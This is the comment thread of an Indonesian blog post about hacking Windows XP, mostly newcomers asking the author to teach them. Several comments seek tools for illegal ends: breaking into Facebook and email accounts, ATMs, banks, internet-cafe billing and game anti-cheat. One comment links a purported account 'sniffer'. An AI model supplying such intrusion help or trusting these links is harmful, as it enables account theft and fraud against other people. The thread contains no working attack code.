xkakwkaxka
cayo teruzzzzz!!!!

2 02 2009
C_I_A

klo bisa hack jg dwonk windows vista nya, n ajarin cra ny ok????? q tgu

5 02 2009
lumeo_genjer

mas tolong ajarin saya hack XP.

pengen jd hack xp..masalahnya xp saya sering eror/rusak ga jelas …

makasih sebelumnya..

21 02 2009
Denis

Wah makin banyak yah yang posting Info2 Belajar Hacking
Sep…………..Deh

1 03 2009
Fitra Nuzul Ramadhan

w mo tnya ni
cara balikin data yg hilang d’Linux gmn
please bgt bntuin w cuz bnyk data pnting

22 09 2009
tata

orang bodoh tp sok tahu ny……!?
lihat filesystemnya dulu kali….
klo udah coba pake GetDataBack

download disini

http://www.4shared.com/file/15378431/654be094/Get_Data_Back_303.html

23 03 2009
padol

bang nihhhhhh aku padol yang tergila” yang namanya heck……..
tpi aku masih bingung bang ngejalaninnya tolong bantuannya bang yaaaaaaaaaaa………
moga”heck tetap berjayaaaaa……………

30 04 2009
sapi

,__,
(oo)____
(__) )\
||–|| *

18 06 2009
"G"

TuW TUjUAnX U/ HAcK Ap YAW???????

Apa ItW BIsa BwAt BoBol BanK???????

22 06 2009
Ismail

wah………. jd pengen belajar banyak tentang hacking neh.
klo mo belajar hacking musti mulai dr mana yah?

24 06 2009
jj

baru dari http://terra.hostei.com , lumayan juga,

14 07 2009
alan

kirimin dong artikel hack ke email gua ya bang chairil…
thanks sbelumnya…

15 07 2009
gur dur

ngapain ngehack segala kl tentang pasword ..tanya aja pasord nya ama yg punya pc gitu aja koq repot

20 07 2009
darmaone1011

thanks bro

22 07 2009
demilord

🙂

31 07 2009
robi winata

selamat buat kamu ya……….
oya gw aajari donk untuk jd hecker yang handal……….

31 07 2009
robi winata

oya gw jg bleh jd teman u…………..????????
oya gw pengen bisa jago di komputer………..
tolong u kirim kan ke imail q

yushi_robbie@yahoo.com
ok gw tungguin loh…………

31 07 2009
robi winata

zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

2 08 2009
Tukang Kritik

hmpss .. bagus sih.. tapi hacker tidak butuh pergi ke komputer target….
gmn klo target gak mau pinjemin buat buka IE nya dia….????
gmn klo Target ntuh bos ..???
gmn klo Targetnya Lebih tau..???

Hack TIdak Perlu Mengunjungi KOmputer Target
pisss

2 08 2009
Tukang Kritik

LUpa 1

klo Kudu Ke komputer Target … mendingan aja skalian rusakin di tempat
atau banting aja Pc nya skalian

coz secara langsung atau tdk langsung setelah kita cabut dari komp target dan
berselang beberapa waktu komp ada yang aneh… .. tersangka Utama adalah dirimu

14 08 2009
regina

wah.. gue kagak ngerti apa yang dijelasin..

7 09 2009
yani

ga ada basic kali gw buat jadi hacker..tapi kok pengen tau ya..ajarin donk pelan2.thx ya…met kenal jg

20 09 2009
steven.G

waduh bulet tuh hacknya

25 09 2009
pulsa gratis

wah kok pinter?? apa makanya juga sama nasi bos?? klo cara biar dapet internetan gratis pakai windows XP bisa ga ?? tq tronik pulsa elektrik

13 10 2009
seen_think

Manteeebbbbb bbrrooooooooo
Link bAck yawh ^.^v

13 10 2009
seen_think.

Manteeebbbbb bbrrooooooooo
Link bAck yawh ^.^v

14 10 2009
caun

bisa tolongin gw cari sofware hack facebook…
kl bisa kirim keeamil gw ya… ne email gw,,,,
candra3687@gmail.com

29 10 2009
sk@tersboy

terlalu rumit,….
dan hasilnya pun g akan efisien !!…..

31 10 2009
kuntikun

mas gmn caranya.. ilangin gameguard pada game online.. supaya kita bs pake cheat engine.. tiap minggu kan gameguard patch, pgn ilangin aja tuh gameguard selamanya.. gmn caranya.. mohon bantuannya ..

thx..

9 11 2009
budi setiawan

salam kenal saudara q bisa minta aplikasi buat bobol atm,tolong ya soalya q nak perantauan yg cuman sendiri di sby,butuh biaya hidup,cukup aplikasi aja ya ,semoga tuhan membalas kebaukan saudara,

13 12 2009
andre

boss aku mau blajarr … gmna nati gue bayarr looo

13 12 2009
andre

085725880003 nope aku … bener gue kursus aja ma looo .. gue kpengen banget ,, kaya looo bosss….

17 01 2010
rizki

hai bang salam kenal ya…………..
gw pengen bgt jd hacker,gmn che cara yg paling mudah jd hacker……..
tp gw masih blom byk tw tentang program2nya……….???????
jalan keluarnya gmn….???
makasih ya bang.

19 01 2010
Ifan

Dear Chaidir,

Saya Ifan karyawan sebuah perusahaan, saya sangat ingin sekali belajar hacking, mohon bantuannya untuk bimbingan dari hal dasar.. alasan saya adalah saya sering ke hack demi melindungi usaha warnet dan computer kantor dari hacker yang tidak bertanggung jawab. saya itulah sebabnya motivasi saya. namun saya bingung untuk belajar hacking.
mohon bantuannya.

salam sukses,

Ifan

20 01 2010
andri

panteq kalian semua

20 01 2010
andri

kalian semua anjing yang gag taw diri………….?/
matilah para hacker kampungan

panteq

20 01 2010
andri

panteq lge………

20 01 2010
andri

by by by byby………….hanjing yang bca…………??/

31 01 2010
ivan

artikel ne sangat menarik,,,,,,,,,

31 01 2010
ivan

bang,,,,,
tolong kirim donk software yang bisa bool biling warnet……….
alna ada satu warnet yang billing na cpat x,,,,,
bw orang rugi terus………
krim ke email ku ya,,,,
thanks,

11 03 2010
adnan

yea q dah bisa nah hackeer………….heheheheh

16 03 2010
marshal

bro..gw ga mudeng ni maklum baru..bisa ajarin dari nol ga thks

18 04 2010
loxsado

kk aku pemula aku penge’n
belajarrr nge’hackk tolon’g ajarinn aku yaa’
biarr nanti kita tukar ilmu

18 04 2010
loxsado

kk Chaidir lehh minta facebook kk nga’k?????

22 04 2010
Benimegicsen's Blog

[…] Belajar Hack Yuck! (3) – Hack Windows XP SP2 […]

27 06 2010
nobbel

bang segini banyakx yang minta massa mau di ajari semua
apa jadix nanti heheheheeee
gileee bener
guwe jga mau di ajarin bang.
sriuz bang

4 07 2010
engjiie

AKU MAU DONK DI AJARIN CARA HACK AKUN FACEBOOK SAMPAI MENDAPAT PASWORD IMEL ORANG. SOALx AKU MAU AMBIL KEMBALI AKUN FB SAYA YANG HILANG TLNG AJARIN DONK CARAx……….. ATAU CALL D NO. 085255740000 BY.ENGJIIE SEMOGA ADA YANG BERMINAT ADA IMBALAN TERIMA KASIHx ………. DI TUNGGU COY

14 08 2010
much sehrul

numpang baca yach… ;D

26 08 2010
sendara

like….
gan, biar ram jadi cpet gimana?

19 09 2010
gerry

mau hack zp

6 10 2010
rian

how to hacker a facebook, yahoo, hotmail following this :

http://firefox-sniffer.blogspot.com/

15 10 2010
rizky

boz g mw jd hacker cm q blm ngerti soal artikel di atas.ada buku panduan atw apkh biar aq bisa.nge hack kmputer musuhq.klo ada sms k noq 085250095381.

16 12 2010
rahmatdarmawan

MAS.. saya tertarik banget ingin belajar..
tolong bantu sya cara ngehack permainan chip TEXAS HOLDEM POKER..
saya kesal setia menang banyak selalu du hack,, chip saya hilang gtu ajh..
tolong bantu saya gmna caranya..????

29 03 2011
irfan lagi

http://banyak-game-seru.blogspot.com KUMPULAN GAME SERU BRO

2 04 2011
Falcon

halo kk,,,!, slam knal,
aq sangat inig jdai hacker yg handal, berawal dari nonton film “Bloody Monday”
aq jdi yg menceritakan seorang hacker yg jenius, karena tu aq jdi ingin blajar nge-hack, apa ada yg buka khursus hack, klo ada aq ingin ikut..?,

2 04 2011
Falcon

kk chaidir, punya fb ..?, klo punya boleh aq ADD, email nya pa …..?, please…!

2 04 2011
puji

makasih gan,
ajarin gw hacking, aq newbie

15 06 2011
OHP

bro ajarin aku dong minat banget hacking2

contack me @okta_vian10 ya

18 07 2011
dvd

makasih….

30 07 2011
zoldiyex

cool….i’ll try..

10 09 2011
m farhan haidar

Yang bagian Ke-2 mana gan?

15 09 2011
abangpusing

keren coy

25 09 2011
iqo

hmmmmmmmmm..
pngen cba2 ah .
tpi msih gk ngerti..
huaaaaaaaaaa
maklum lh nma nya jg anak(12 thun) hehe,,,,
alias remaja

6 10 2011
diday

sebenernya langsung pake perintah
C:\>net use
juga bisa, kang …
coba liat deh di

http://www.facebook.com/profile.php?id=100002572248481

18 11 2011
zerosspa

nggabung bang…..
pengen belajar hacking aahhh🙂

salam kenal🙂

26 11 2011
Agoes Arie

bang chai….gmn buka data orla

8 12 2011
Dicka Al

kang, ajarin saya ng’hack dong…

15 12 2011
Jay Yanti

wah banyak amat yang penasaran sma blajar hacker jdi tmbah penasaran sama apa itu hacker dan gmana caranya, tpi sy msh ank bwng yng blum tau apa2 tpi sya pnsaran gmana sih cara bljar hacker

15 12 2011
Jay Yanti

tpi gmana sih hlangin rsa tkut buat cba2 kya gtu

13 01 2012
muliani

thx’ informasinya bos jadi tambh deh ilmu pengetahuan tentang internet

20 01 2012
iesan

20 01 2012
14 03 2012
Javanese Batik

Ctrl+D dulu deh mas Chaidir🙂 … Kalo kepala ini udah dingin baru buka2 lagi😀

15 04 2012
jampang

sempoaaaaaaaaaaaa

15 04 2012
jampang

tlg di bantu ya agar bs hack bank , yg bs bantu kirim di budisantoso00122@yaho.com

28 04 2012
pindo

makasih om…tolong kirim informasi …tempat download sofwere nya…
panduanya….makasih sebelum nya om,….npopindo123@gmail.com

6 05 2012
masbro

mcool

31 05 2012
benitorynaldi

lanjutkan bro

15 06 2012
aries

blog ini msh hidup,,, tetapi software downloadnya dah ga hidup,, klo bsa ksh link yg bru lg ,,, aku masih newbie lg semangat buat blajar tntng ini,,,,

4 07 2012
ichi

waaa.. gw kagak ngerti sm sekali.. ==” ada yg bsa ngasih privat gk?.. wkwkwk

9 10 2012
deedy

to bung chai,..
bgs nih kyk ny artikel hbs bnyak yg coment Ok,..
tp gw ga ngerti sm skali hbs ny pemula sih hehehehehe….
salut sm bung cahi..

3 12 2012
ovie

bung chai….
FB q dheck org,
bisa ajri ngeheck balik g’?
sttusx tiap kali sllu isix jelek”,
mhon bantuannya,
trimakasih🙂

26 12 2012
authentic cheap designer handbags

I will right away snatch your rss as I can not in finding
your e-mail subscription hyperlink or newsletter service. Do you’ve any? Please permit me recognize so that I may subscribe. Thanks.

31 01 2013
CrazyGuyZz

mantap.. w pemula mau ikutan jadi hacker ajrarin please

5 02 2013
Rangga Rockcrees

gua mau nnya emank kalo gua bisa meng heck , apa gua juga bisa buat perogram aplikasi gitu

25 03 2013
Mahyat Sang Pemimpi Linux

aku juga pengin bisa ngehack…contohnya mbobol pasword admind warnet,,,,
ajarin dong

23 11 2014
Ozumbala X-Choice

Assalamualaikum chaidir

Leave a Reply

